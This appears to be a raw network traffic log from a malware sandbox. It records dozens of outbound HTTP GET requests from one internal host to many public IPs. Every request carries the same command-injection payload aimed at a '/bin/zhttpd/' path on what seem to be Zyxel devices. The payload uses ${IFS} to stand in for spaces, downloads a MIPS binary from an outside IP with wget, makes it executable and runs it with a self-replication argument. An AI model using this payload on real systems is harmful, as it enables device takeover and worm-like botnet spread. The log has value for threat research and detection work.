                                                Jan 28, 2024 10:16:27.847058058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4961192.168.2.234878649.63.226.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847091913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4962192.168.2.236007683.159.211.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847109079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4963192.168.2.234721645.94.200.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847137928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4964192.168.2.2357676168.228.183.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847151995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4965192.168.2.234213284.100.157.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847191095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4966192.168.2.2348988218.17.106.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847217083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4967192.168.2.235773637.150.62.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847243071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4968192.168.2.235366441.177.60.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847278118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4969192.168.2.234908227.228.26.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847294092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4970192.168.2.2350398117.24.248.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847335100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4971192.168.2.2352606191.90.6.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847378969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4972192.168.2.235134459.34.57.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847412109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4973192.168.2.234751685.112.100.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847440004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4974192.168.2.2355706118.243.24.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847490072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4975192.168.2.2345286153.9.243.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847507954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4976192.168.2.2337764120.229.123.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847542048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4977192.168.2.234590438.63.248.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847575903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4978192.168.2.233854887.152.64.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847599983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4979192.168.2.2356588204.140.231.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847621918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4980192.168.2.233838242.1.53.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847651958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4981192.168.2.2360598105.98.16.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847681999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4982192.168.2.2336404184.32.248.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847726107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4983192.168.2.235717217.101.244.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847743034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4984192.168.2.235029436.76.81.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847764015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4985192.168.2.2356414220.53.226.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847788095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4986192.168.2.2351816118.160.32.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847790956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4987192.168.2.234596071.102.63.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847820044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4988192.168.2.2348790103.87.154.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847848892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4989192.168.2.233823880.28.164.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847877979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4990192.168.2.2349920203.251.24.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847930908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4991192.168.2.234282219.194.169.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847960949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4992192.168.2.2354980148.25.31.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.847976923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4993192.168.2.2360262187.184.145.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848032951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4994192.168.2.2359238195.190.212.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848063946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4995192.168.2.2336618192.51.180.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848093987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4996192.168.2.2346966166.72.31.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848124981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4997192.168.2.2360078135.201.214.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848135948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4998192.168.2.2338030113.255.153.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848154068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4999192.168.2.2349512186.121.81.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848186016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5000192.168.2.233709682.171.6.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848237038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5001192.168.2.2334998104.179.18.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848249912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5002192.168.2.2357328168.231.31.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848263025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5003192.168.2.233950684.132.86.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848294973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5004192.168.2.2357200198.111.231.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848330975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5005192.168.2.2337034175.140.154.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848352909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5006192.168.2.2359716151.229.85.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848367929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5007192.168.2.2353428213.125.27.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848406076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5008192.168.2.2338200192.127.154.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848428011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5009192.168.2.2333906165.56.255.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848453045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5010192.168.2.2357418152.163.19.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848510981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5011192.168.2.2343812112.174.105.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848519087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5012192.168.2.2359992133.148.15.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848556995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5013192.168.2.2355726213.60.5.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848572969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5014192.168.2.233949295.191.209.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848599911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5015192.168.2.2344410121.75.81.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848630905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5016192.168.2.23418765.166.66.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848653078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5017192.168.2.2347880102.230.67.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848694086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5018192.168.2.2352912133.50.146.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848721981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5019192.168.2.2349084110.158.3.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848752975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5020192.168.2.23392761.100.56.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848769903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5021192.168.2.234909890.29.167.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.848783970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5022192.168.2.23560489.129.129.123443
                                                TimestampBytes transferredDirectionData
